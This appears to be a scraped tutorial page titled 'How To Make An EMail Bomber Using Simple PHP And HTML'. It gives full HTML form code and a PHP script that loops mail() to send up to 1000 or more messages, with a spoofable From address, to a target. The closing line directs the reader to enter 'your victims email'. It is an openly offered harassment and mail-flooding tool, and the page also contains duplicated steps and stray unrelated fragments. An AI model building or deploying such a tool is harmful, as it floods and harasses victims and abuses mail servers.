How To Make An EMail Bomber Using Simple PHP And HTML

917
Twitter Direct Message Caching and Firefox – Mozilla Hacks

What You’ll Need?
Webhosting – Make Sure You Have SMTP Or It Won’t Work
Small Knowledge About PHP And HTML

:o:Steps:
1. So First We Will Want To Create A File Calledindex.html

2. We Will Place The Following Code In The index.html

3. Go ahead And Save That File In A Folder, Name The Folder What-Ever You Want.

4. Now In That Folder Go Ahead And Create A File Namedemail.php

5. Now Open The email.php And Place The Following Code Inside It.

6. Now You Can Go Ahead And Upload It To Your Server, And Boom.

 

 

You’ll Need:
1 Webhosting – Make Sure You Have SMTP Or It Won’t Work
Small Knowledge About PHP And HTML

Steps:
1. So first we will want to create a file called “index.html”
2. We will place the following code  in the index.html

Code:
<html>
<head>
<title>Email Bomber</title>
</head>
<body>
<center>
<h1 style=”color:white;font-shadow:0px 0px 2px blue;”>Simple Email Bomber</h1><br>
<!–This is where the forms starts–>
<form action=”email.php” method=”post”><br>
Email: <input type=”text” name=”email” /><br>
Amount to send : <input type=”text” name=”spam” /><br>
Subject: <input type=”text” name=”subject” /><br>
Message: <TEXTAREA NAME=”message” ROWS=6 COLS=40></TEXTAREA><br>
From: <input type=”text” name=”from” /><br>
<input type=”submit” value=”send” /><input type=”reset” />
</form>
</center>
</body>
</html>

3. Go ahead and save that file in a folder, name the folder what-ever you want.
4. Now in that folder go ahead and create a file named “email.php”
5. Now open the email.php and place the following code inside it.

Code:
<?php

$num = 1;
$email = $_POST[’email’];
$spam = $_POST[‘spam’];
$subject = $_POST[‘subject’];
$message = $_POST[‘message’];
$from = $_POST[‘from’];
$send = $_POST[‘send’];
if($spam==’ ‘)
{
$spam = 1000; // this is for if the Amount to send = nothing then it will send 1000 emails
// you can change it too what-ever you want.
}

if($spam!=” && $email==”)
{
die(‘Please enter an email!.’);
}

if($email != ”)
{
while($num<=$spam)
{
mail ($email, $subject, $message, “From: ” . $from);
echo $num . “<br>”;
$num++;
}
}
?>

6. Now you can go ahead and upload it to your server, and boom.

Now you should be able to go to your domain/url and find that theres a panel there, go ahead and fill it out with your victims email & the message to send/spam and press the send button.